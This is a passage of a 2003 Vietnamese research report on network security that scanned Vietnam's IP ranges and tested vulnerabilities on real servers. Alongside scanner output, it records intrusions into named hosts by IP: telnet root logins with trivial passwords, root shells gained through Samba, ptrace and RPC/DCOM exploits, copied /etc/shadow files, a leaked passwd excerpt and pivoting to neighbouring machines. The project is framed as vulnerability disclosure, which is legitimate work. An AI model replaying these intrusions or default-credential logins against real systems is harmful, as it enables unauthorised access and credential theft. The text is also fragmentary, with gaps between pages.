Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
1
THÀNH PHỐ HỒ CHÍ MINH
Tháng 12 năm 2003
ĐỀ TÀI NGHIÊN CỨU ỨNG DỤNG
HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN
CHO CÁC MẠNG TIN HỌC VIỆT NAM Báo cáo tổng quan
Chủ nhiệm đề tài:
Trịnh Ngọc Minh
CN Nguyễn Kim Trang SaigonCTT
SV Nguyễn Anh Tú SaigonCTT
CN Đỗ Mạnh Tiến SaigonCTT
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
3
1 Hòan cảnh hình thành đề tài
Cuối năm 1999, web site của ĐHQG-HCM bị cracker từ nước ngòai thay đổi bằng một
nội dung phản động ! Đây là hồi chng cảnh báo đầu tiên về khả năng bị tấn cơng từ
ngòai vào mạng ĐHQG-HCM và giúp chúng ta cảnh tỉnh về trình độ còn rất non yếu của
nhóm quản trị mạng ĐHQG-HCM về vấn để bảo mật hệ thống.
Sớm nắm được mối hiểm nguy khi kết nối vào Internet và nhận thấy sự cần thiết phải
nâng cao trình độ của cán bộ quản trị mạng, Lãnh đạo ĐHQG-HCM đã phê duyệt đề tài
nghiên cứu trọng điểm cấp ĐHQG về “An tòan và bảo mật hệ thống thơng tin”. Nội dung
chính của đề tài là tìm hiểu các phương thức xâm nhập hệ thống của các hacker/cracker
nhằm nâng cao trình độ quản trị mạng và tăng cường khả năng bảo mật cho các máy chủ.
Đề tài đã được triển khai trong hơn một năm và được nghiệm thu cuối năm 2001 với
kết quả tốt. Nội dung chính của đề tài là tìm hiểu các phương thức xâm nhập một hệ
thống tin học và đề ra một số phương pháp phòng chống như qui trình xây dựng máy
chủ an toàn, một số phương pháp phát hiện backdoor …
Đề tài của ĐHQG chính là bước chuẩn bò kỹ thuật cho phép triển khai đề tài đang được
đề cập. Với những kiến thức, kỹ năng về tìm hiểu các sơ hở của hệ thống tích lũy từ đề
tài của ĐHQG-HCM, chúng ta có thể tìm ra các sơ hở của các mạng tin học thông qua
Internet, cảnh báo các nhà quản trò mạng thông qua các thông tin “nặng ký” như thông
báo sơ hở với những bằng chứng như password của admin, thông tin tài khoản cá nhân,
khả năng thay đổi nội dung Website …
Tự biết mạng tin học của mình sơ hở và tự sửa chữa là một điều rất khó khăn. Với hơn
một năm nghiên cứu vấn đề bảo mật hệ thống của một số mạng tin học của Việt nam,
kể cả các mạng ISP chuyên nghiệp như VDC, FPT, SaigonNet, Netnam … chúng tôi
2 Mục tiêu của đề tài
Với các phân tích như ở trên, mục tiêu chính của đề tài nhằm vào các vấn đề sau:
a/ Tìm ra các sơ sở của các mạng với kết nối trực tiếp Internet của Việt nam
b/ Thông báo cho các mạng tin học có sơ hở lỗi cùng với các minh chứng. Cung cấp
các phương thức sửa chữa như download giúp các phần mềm vá lỗi, hoặc chỉ dẫn các
cấu hình sửa chữa. Kiểm tra lỗi sau khi đã sửa chữa.
c/ Xây dựng website với mức độ bảo mật cao. Công bố mô hình Website và phương
thức xây dựng cho phép các đơn vò được triển khai miễn phí
d/ Nghiên cứu so sánh các công nghệ IDS cứng và mềm. Đưa ra các khuyến cáo.
3 Các nội dung chính của đề tài
a/ Khảo sát hiện trạng.
Phần khảo sát hiện trạng sẽ gồm 2 phần.
Phần 1: Thu thập thông tin về tất cả các mạng tin học của Việt nam. Mạng tin học Việt
nam là những mạng tin học mà điểm kết nối của nó nằm sau các cổng gateway của
Việt nam. Nói một cách kỹ thuật, đó là những mạng sử dụng hệ thống đòa chỉ IP của
Internic cấp phát cho Việt nam. Do đó, những mạng tin học có tên miền không kết
thúc bằng .vn những được truy cập thông qua các IP của Việtnam sẽ là các đối tượng
nghiên cứu.
Các thông tin thu thập sẽ bao gồm danh sách các dòch vụ mà mạng đó cung cấp ra
ngoài, các đặc điểm chuyên biệt của các dòch vụ, hệ thống máy chủ và các phần mềm
tương ứng, các thiết bò mạng, đặc biệt là các thiết bò liên qua tới bảo mật.
Các thông tin này sẽ được thu thập từ nhiều nguồn khác nhau như dùng công cụ khảo
sát mạng, tra thông tin DNS, tra thông tin trên trang Web …
Phần 2: Thu thập thông tin về các sơ hở của mạng cùng các kỹ thuật xâm nhập mới.
Nhóm nghiên cứu cần được cập nhật các kiến thức về các phiên bản hệ điều hành mới
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
5
như Solaris 9, RedHat Linux 8, Windows Xp … cùng với các thông tin liên quan tới các
• Không được gây bất cứ một sự rối loạn nào, dù nhỏ, trong hoật động bình
thường của mạng.
• Không được lấy, sử dụng bất kỳ bất kỳ dữ liệu nào của mạng nghiên cứu
• Các bằng chứng về sơ hở có tính thuyết phục cao, đặc biệt có tính nghiêm trọng
của hậu quả nếu bò xâm nhập cho phép phụ trách kỹ thuật của các hệ thống
mạng có thể thuyết phục lãnh đạo về các đầu tư nhằm tăng cường an ninh của
mạng tin học của mình.
• Trong trường hợp mạng đã có sơ hở, tìm kiếm các backdoor có thể có do các
cracker đã làm trước đó. Đây là một nội dung có tầm quan trọng đặc biệt vì nếu
mạng đã có sơ hở thì với xác suất cao là mạng đã bò xâm nhập và bò cài
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
6
backdoor. Các backdoor đó có thể được che dấu tính vi và thực sự nguy hiểm
nếu không phát hiện được chúng. Với nhiều hệ thống, một khi một máy có
backdoor thì tất cả các thiết bò, phần mềm bảo mật đắt tiền khác của hệ thống
sẽ bò vô hiệu hóa.
e/ Nghiên cứu các phương pháp bảo vệ và đánh giá hiệu quả.
Sau khi phát hiện các sơ hở, đánh giá mức độ nguy hiểm của từng sơ hở, nhóm nghiên
cứu sẽ xem xét các phương thức bảo vệ. Các giải pháp bảo vệ khác phục sơ hở sẽ được
thông báo chi tiết tới các mạng tin học có vấn đề. Trong khả năng cho phép, nhóm
nghiên cứu sẽ tải về và chuyển giao các phần mềm cần thiết cho đối tượng nghiên cứu
cùng với các khuyến cáo.
f/ Đào tạo và chuyển giao công nghệ.
Nhóm nghiên cứu sẽ tổ chức một một hội thảo rộng rãi cho khoảng 50 lãnh đạo và
chuyên viên IT và một lớp tập huấn cho 20 quản trò viên mạng tin học, đặc biệt là cho
các công ty đã phối hợp chặt chẽ với nhóm nghiên cứu, nhằm nâng cao trình độ bảo vệ
hệ thống của các cán bộ quản trò mạng. Chi phí của các hoạt động này đã được dự trù
trong kinh phí của đề tài.
4.2 Tìm hiểu các dịch vụ triển khai trên các máy chủ của các
mạng tin học Việt nam,
Cơ sở dữ liệu các địa chỉ IP cùng với các thông tin về dịch vụ đang mở trên từng IP là rất
quan trọng, cho phép chúng ta nhanh chóng xác định khả năng bị xâm nhập đối với một
máy tính. Giả sử ta có được thông tin từ Internet về một kiểu sơ hở, ta có thể tìm trong cơ
sở dữ liệu này địa chỉ IP có sơ hở tương ứng và nhanh chóng tiến hành xâm nhập thử
nghiệm xem có thể hiện thực hóa xâm nhập được hay không.
Theo thông tin từ APNIC, tổ chức quản lý Internet tại châu Á, Việt nam chúng ta có 3
vùng AS (Autonomous System) ( và khỏang 83456 IP Việc “quét” tòan bộ tất cả các IP trên là một công việc lớn và làm ảnh hưởng nhiều tới
mạng của máy đi quét cũng như máy bị quét. Nhóm nghiên cứu đã phải tực hiện chủ yếu
các thao tác này vào nghỉ cuối tuần và ban đêm. Chiến lược “quét” của chúng tôi là dò
tìm tất cả các port trên một số mạng quan trọng, các IP quen biết và dò tìm một số cổng
dịch vụ phổ biến cho các IP khác.
Cụ thể là công tác dò tìm các port cơ bản được thực hiện cho
203.113.128.0 (8192)
203.160.0.0 (512)
203.161.0.0 (1024)
203.162.0.0 (4096)
apnic
VN
asn
apnic
VN
ipv4
203.160.0.0 512 19940923
assigned
apnic
VN
ipv4
203.161.0.0 1024 19950308
allocated
apnic
VN
ipv4
203.162.0.0 2048 19950809
allocated
apnic
VN
203.162.160.0 8192 20021105
allocated
apnic
VN
ipv4
203.162.32.0 8192 19981123
allocated
apnic
VN
ipv4
203.162.64.0 16384 20010718
allocated
apnic
VN
ipv4
203.162.8.0 2048 19981102
allocated
203.162.57.0/24
203.162.97.0/24
203.113.131.0/24
Tỉ lệ IP đã scan của vùng này 11.35%
Cùng với dò tìm các sơ hở một cách đại trà trên mạng, nhòm nghiên cứu cũng đã thực
hiện việc phân giải tên của các IP để biết chủ sở hữu của các IP. Với một phần mềm nhỏ,
nhóm nghiên cứu đã thử cho tất cả các địa chỉ IP nhưng chi phân giải được 783 địa chỉ,
chiếm 0,94 %. Nguyên nhân của kết quả này là rất nhiều địa chỉ IP chưa sử dụng, địa chỉ
IP dùng cho kết nối động qua dial-up, ADSL; IP dùng cho kết nối routers; và rất nhiều
tên miền không có phân giải ngược IP-> tên trong Cơ sở dữ liệu DNS. Phụ lục B sao
trính một phần các địa chỉ IP có tên miền tương ứng.
Các tiện ích được sử dụng để tiến hành thăm dò các dịch vụ đang họat động trên một
máy chủ là
• Trên Windows: SuperScan (thích hợp khi cần scan nhanh)
• Trên Unix: nmap, nessus
Kết quả thăm dò các mạng khá dài (trên 2000 trang), do đó nhóm đề tài chỉ xin trích đoạn
một số kết quả làm ví dụ:
203.113.142.14
Service Severity Description
telnet (23/tcp) Info Port is open
general/udp Low For your information, here is the traceroute to 203.113.142.14 :
192.168.20.2
192.168.20.2
192.168.20.2
203.113.142.14
Solution : Comment out the 'telnet' line in /etc/inetd.conf.
Risk factor : Low
Page 7
Network Vulnerability Assessment Report 05.08.2003
CVE : CAN-1999-0619
203.113.142.2
Service Severity Description
telnet (23/tcp) Info Port is open
telnet (23/tcp) Low The Telnet service is running.
This service is dangerous in the sense that it is not ciphered - that is, everyone can
sniff the data that passes between the telnet client and the telnet server. This includes
logins and passwords.
You should disable this service and use OpenSSH instead. (www.openssh.com)
Solution : Comment out the 'telnet' line in /etc/inetd.conf.
Risk factor : Low
CVE : CAN-1999-0619
general/tcp Low The remote host does not discard TCP SYN packets which
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
10
have the FIN flag set. Depending on the kind of firewall you are using, an
attacker may use this flaw to bypass its rules.
See also : Solution : Contact your vendor for a patch
Risk factor : Medium
BID : 7487
general/udp Low For your information, here is the traceroute to 203.113.142.2 :
192.168.20.2
192.168.20.2
11
CVE : CAN-1999-0619
general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to
predict the next value of the ip_id field of the ip packets sent by this host.
An attacker may use this feature to determine if the remote host sent a packet in reply
to another request. This may be used for portscanning and other things.
Solution : Contact your vendor for a patch
Risk factor : Low
general/udp Low For your information, here is the traceroute to 203.113.142.30 :
192.168.20.2
192.168.20.2
203.113.142.30
telnet (23/tcp) Low A telnet server seems to be running on this port
general/tcp Low Remote OS guess : Cisco 3600 running IOS 12.2(6c)
CVE : CAN-1999-0454
Page 10
Network Vulnerability Assessment Report 05.08.2003
telnet (23/tcp) Low Remote telnet banner :
User Access Verification
Username:
general/tcp Low The remote host does not discard TCP SYN packets which have the
FIN flag set. Depending on the kind of firewall you are using, an
attacker may use this flaw to bypass its rules.
See also : Solution : Contact your vendor for a patch
Risk factor : Medium
BID : 7487
1) 203.162.57.227 (Suntest.vnnic.net)
a. Hệ điều hành: Solaris 8
b. Hostname: Suntest
c. Lỗi remote:
i. Telnetd exploit trên Solaris cho các version 2.6, 2.7, 2.8
ii. Exploit code đã được công bố trên internet khá lâu
iii. Dùng exploit code trên máy Linux từ xa có thể chiếm được shell với quyền của user
bin
d. Lỗi local
i. priocntl exploit trên Solaris với cấu trúc lệnh 64 bit
ii. Lỗi này cũng đã được thông báo trên internet
iii. Khai thác thành công đem lại root shell
iv. Kết quả:
1. tạo file /etc/.bugsearch
2. copy file /etc/passwd, /etc/shadow
( Exploit code, /etc/passwd,/etc/shadow và màn hình copy đính kèm ).
2) 203.162.53.51 ( Stelecom)
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
oms1# /usr/sbin/ifconfig -a
lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232
inet 127.0.0.1 netmask ff000000
hme0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST>
mtu 1500
inet 10.1.11.12 netmask ffff0000 broadcast 10.1.255.255
ether 0:3:ba:9:3a:a2
oms1#
Từ máy hrl chỉ cần telnet sang máy oms1 với user root, passwd root:
# telnet oms1.lgic.co.kr
Trying 10.1.11.12...
Connected to oms1.lgic.co.kr.
Escape character is '^]'.
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
14
SunOS 5.7
welcome to oms1
don't work other jobs
login: root
Password:
Sun Microsystems Inc. SunOS 5.7 Generic October 1998
You have new mail.
oms1# w
1:15pm up 103 day(s), 2:48, 2 users, load average: 0.02, 0.02, 0.02
User tty login@ idle JCPU PCPU what
oms console 20Jun03103days /usr/dt/bin/sdt_shell -c unseten
oms pts/3 16Sep0315days /bin/csh
3) 203.162.53.52 ( Stelecom)
a. Hệ điều hành: Solaris 7
b. Hostname: ho_eipa
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
15
c. Local IP: 10.1.120.11 - 10.1.110.21
d. Lỗi remote: Telnetd với password đơn giản
Có thể telnet vào máy này bằng user root và password root.
[root@bugsearch hao]# telnet 203.162.53.52
Trying 203.162.53.52...
Connected to 203.162.53.52 (203.162.53.52).
Escape character is '^]'
SunOS 5.7
+====================================================+
+==== ====+
+==== WELCOME to Hochiminh eip_A ====+
+==== ====+
+====================================================+
login: root
Password:
Last login: Mon Sep 29 13:47:47 from hanoi_eipa
Sun Microsystems Inc. SunOS 5.7 Generic October 1998
You have mail.
ho_eipa# w
1:59pm up 77 day(s), 13:43, 8 users, load average: 0.04, 0.04,
0.04
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
16
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
nomd:x:1000:1000:EIP User:/home/nomd:/bin/csh
eip:x:1001:1000:EIP Admin:/home/eip:/bin/csh
nms:x:2000:1000:NMS BunDang:/home/nms:/bin/csh
same::0:1:Super-User:/:/bin/csh
-----------------------------------------------------------------
user same có uid=0, gid=1 có quyền tương đương root.
f. Các server lân cận bị khai thác
Dùng lệnh arp –a trên server vừa vào được ta thấy kết quả sau:
ho_eipa# arp -a
Net to Media Table
Device IP Address Mask Flags Phys Addr
------ -------------------- --------------- ----- ---------------
hme0 10.1.120.1 255.255.255.255 00:00:0c:07:ac:78
hme0 ho_eipb 255.255.255.255 08:00:20:fa:6c:c6
hme1 ho_eipaa 255.255.255.255 SP 08:00:20:fa:47:da
hme0 ho_eipa 255.255.255.255 SP 08:00:20:fa:47:da
hme1 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00
hme0 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00
ho_eipa#
Ta thấy có các host sau 10.1.120.1, ho_eipb, ho_eipaa (chính là
ho_eipa vì cùng MAC address)
thử telnet 10.1.120.1 ta thấy đây là Switch, ho_eipb là 1 máy Sun.
i. ho_eipb
(c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved.
(c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of
California
(c)Copyright 1980, 1984, 1986 Novell, Inc.
(c)Copyright 1986-1992 Sun Microsystems, Inc.
(c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology
(c)Copyright 1989-1993 The Open Software Foundation, Inc.
(c)Copyright 1986 Digital Equipment Corp.
(c)Copyright 1990 Motorola, Inc.
(c)Copyright 1990, 1991, 1992 Cornell University
(c)Copyright 1989-1991 The University of Maryland
(c)Copyright 1988 Carnegie Mellon University
(c)Copyright 1991-1997 Mentat, Inc.
(c)Copyright 1996 Morning Star Technologies, Inc.
(c)Copyright 1996 Progressive Systems, Inc.
(c)Copyright 1997 Isogon Corporation RESTRICTED RIGHTS LEGEND
Use, duplication, or disclosure by the U.S. Government is subject to
restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights
in
Technical Data and Computer Software clause in DFARS 252.227-7013. Hewlett-Packard Company
3000 Hanover Street
Palo Alto, CA 94304 U.S.A.
Rights for non-DOD U.S. Government Departments and Agencies are as
HP-UX smschob B.11.00 U 9000/800 (ta)
login: root
Password:
Please wait...checking for disk quotas
(c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved.
(c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of
California
(c)Copyright 1980, 1984, 1986 Novell, Inc.
(c)Copyright 1986-1992 Sun Microsystems, Inc.
(c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology
(c)Copyright 1989-1993 The Open Software Foundation, Inc.
(c)Copyright 1986 Digital Equipment Corp.
(c)Copyright 1990 Motorola, Inc.
(c)Copyright 1990, 1991, 1992 Cornell University
(c)Copyright 1989-1991 The University of Maryland
(c)Copyright 1988 Carnegie Mellon University
(c)Copyright 1991-1997 Mentat, Inc.
(c)Copyright 1996 Morning Star Technologies, Inc.
(c)Copyright 1996 Progressive Systems, Inc.
(c)Copyright 1997 Isogon Corporation RESTRICTED RIGHTS LEGEND
Use, duplication, or disclosure by the U.S. Government is subject to
restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights
in
Technical Data and Computer Software clause in DFARS 252.227-7013.
Đối với server này ta chiếm được shell với quyền của user apache. Tiếp theo ta đưa
chương trình khai thác lỗi local vào để chiếm quyền root.
c. Lỗi local: ptrace
Đa số các kernel Linux version nhỏ hơn 2.4.20 đều bị lỗi này, nếu kernel được biên
dịch lại từ source thì không bị lỗi.
5) 203.162.42.67 ( sng.pwc.com.vn)
a. Hệ điều hành: RedHat Linux 9.0
b. Local IP: 10.161.16.254
c. Lỗi remote: Samba exploit
Lỗi remote Samba trên server này cho phép ta chiếm được shell với quyền root.
Server này là gateway và proxy server, có 02 card mạng
Copy màn hình thực hiện và file /etc/passwd, /etc/shadow
6) 203.162.35.75 (mail.ittivietnam.com)
a. Hệ điều hành: RedHat Linux 7.1
b. Lỗi remote: Samba, apache+ssl
Server này bị xâm nhập thành công qua lỗi apache (version 1.3.23). Chiếm được
remote shell dưới quyền user apache.
c. Lỗi local: ptrace
d. Các backdoor do hacker khác để lại
Khi xâm nhập vào hệ thống, và chiếm quyền root, một số backdoor do các hacker
xâm nhập vào đã được tìm thấy, các file quan trọng trên hệ thống như ls, netstat,
ifconfig đều đã bị thay thế. Trong các lần thâm nhập vào, ta có thể phát hiện ra việc
các hacker dùng server này để scan và làm bàn đạp tấn công các server khác:
Dùng lệnh ps có thể phát hiện ra các proccess dùng để scan này.
bash-2.05a# ps ax|more
PID TTY STAT TIME COMMAND
1462 ? S 0:00 sendmail: accepting connections
1481 ? S 0:00 gpm -t ps/2 -m /dev/mouse
1504 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -
DHAVE_AUTH_
1530 ? S 0:00 crond
1663 ? S 0:00 rhnsd --interval 120
1670 2 S 0:00 /sbin/mingetty tty2
1671 3 S 0:00 /sbin/mingetty tty3
1672 4 S 0:00 /sbin/mingetty tty4
1673 5 S 0:00 /sbin/mingetty tty5
1674 6 S 0:00 /sbin/mingetty tty6
1850 ? S 0:00 CROND
1851 ? S 0:00 /bin/bash /usr/bin/run-parts
/etc/cron.hourly
1864 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron
1865 ? S 0:00 awk -v
progname=/etc/cron.hourly/openwebmail.cron progn
1866 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi-
bin/openweb
1867 ? Z 0:00 [awk <zombie>]
1873 ? T 0:00 /bin/hostname
1874 ? Z 0:00 [hostname <zombie>]
2617 ? T 0:00 ./ssvuln 210.185.ssl 210.185.ssl.out 35
2625 ? Z 0:00 [ssvuln <zombie>]
2666 ? T 0:00 ./ssvuln 210.186.ssl 210.186.ssl.out 35
2678 ? Z 0:00 [ssvuln <zombie>]
2866 ? S 0:00 /usr/sbin/sshd
2873 ? S 0:00 -bash
2924 ? S 0:00 ls --color=tty
2938 ? S 0:00 /bin/sh ./assl 210.188
31703 ? S 0:00 CROND
31704 ? S 0:00 /bin/bash /usr/bin/run-parts
/etc/cron.hourly
31717 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron
31718 ? S 0:00 awk -v
progname=/etc/cron.hourly/openwebmail.cron progn
31719 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi-
bin/openweb
31720 ? Z 0:00 [awk <zombie>]
31729 ? T 0:00 /bin/hostname
31730 ? Z 0:00 [hostname <zombie>]
32385 ? S 0:00 CROND
32386 ? S 0:00 /bin/bash /usr/bin/run-parts
/etc/cron.hourly
32399 ? S 0:00 /bin/bash /etc/cron.hourly/openwebmail.cron
32400 ? S 0:00 awk -v
progname=/etc/cron.hourly/openwebmail.cron progn
32401 ? S 0:00 /usr/bin/suidperl -T /dev/fd/3//var/www/cgi-
bin/openweb
32402 ? Z 0:00 [awk <zombie>]
32423 ? T 0:00 /bin/hostname
32424 ? Z 0:00 [hostname <zombie>]
32425 ? S 0:00 CROND
32426 ? S 0:00 /bin/bash /usr/bin/run-parts /etc/cron.daily
32589 ? S 0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem
root
32615 ? S 0:00 awk -v
progname=/etc/cron.daily/makewhatis.cron prognam
32617 ? Z 0:00 [awk <zombie>]
32743 ? T 0:00 /usr/bin/awk
dhsp uptime is 1 week, 4 days, 9 hours, 28 minutes
System returned to ROM by power-on
System image file is "flash:c2600-i-mz.121-16.bin"
cisco 2620XM (MPC860) processor (revision 0x100) with 53248K/12288K
bytes of memory.
Processor board ID JAD07070YJF (2656094087)
M860 processor: part number 5, mask 2
Bridging software.
X.25 software, Version 3.0.0.
1 FastEthernet/IEEE 802.3 interface(s)
10 Low-speed serial(sync/async) network interface(s)
32K bytes of non-volatile configuration memory.
16384K bytes of processor board System flash (Read/Write)
Configuration register is 0x2102
b. lỗi bảo mật
Lỗi cơ bản nhất đó là không đặt password telnet, khi telnet vào
router ta được ngay ….
[root@bugsearch /]# telnet 203.162.35.33
Trying 203.162.35.33...
Connected to 203.162.35.33 (203.162.35.33).
Escape character is '^]'.
dhsp>
4.4 Bước tiếp theo, thử enable, password được hỏi, sau vài lần thử, ta thành công với
một password đơn giản.
c. Lỗi local: printioctl
10) 203.162.0.41 ( radius.vnn.vn)
a. Hệ điều hành: Solaris 7
b. Lỗi remote: telnetd
c. Lỗi local: priocntl
11) 203.144.70.17 ( cambodia)
a. Hệ điều hành: Linux Suse
b. Lỗi remote: Samba
c. Lỗi local: ptrace 12) 203.162.17.142
a. Hệ điều hành: WindowNT
b. Lỗi bị khai thác: RPC, DCOM
date
Tue Jul 29 02:04:53 ICT 2003
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>mkdir bg
mkdir bg
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
24
C:\WINNT\system32>dir
dir
C:\WINNT\system32>mkdir bg
mkdir bg
C:\WINNT\system32>cd d:
cd d:
D:\
C:\WINNT\system32>d:
d:
The device is not ready.
C:\WINNT\system32>e:
e:
The system cannot find the drive specified.
C:\WINNT\system32>dir c:\
dir c:\
Volume in drive C has no label.
Volume Serial Number is 5057-5682
Directory of c:\
11/07/2002 06:35p 2,975 1
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
25
11/07/2002 06:21p 0 a
11/06/2002 11:58a <DIR> Documents and Settings
11/06/2002 11:39a <DIR> Inetpub
04/08/2003 08:18a 13,030 PDOXUSRS.NET
02/28/2003 03:23p 3,072,573 pi_winproxy.exe
Volume in drive C has no label.
Volume Serial Number is 947B-CC93
Directory of C:\
07/29/2003 02:05p <DIR> 111
07/02/2003 04:46p <DIR>
3797132a906c136b43bf566cd6582ae3
06/18/2003 05:05p <DIR> AMERIC
07/10/2003 11:50a <DIR> AuditNTPass
07/30/2003 08:12p <DIR> CISCO
04/23/2003 06:01p 6,694 CLDMA.LOG
11/21/2002 10:01a <DIR> Container
11/03/2002 02:09p <DIR> demo_CCNA
06/28/2003 03:41p <DIR> Download
15) 203.162.6.115 - www.cp.com.vn
a. Hệ điều hành: WindowNT
b. Lỗi bị khai thác: RPC, DCOM
Tue Jul 29 01:20:01 ICT 2003
Copyright: Tài liệu đại học ©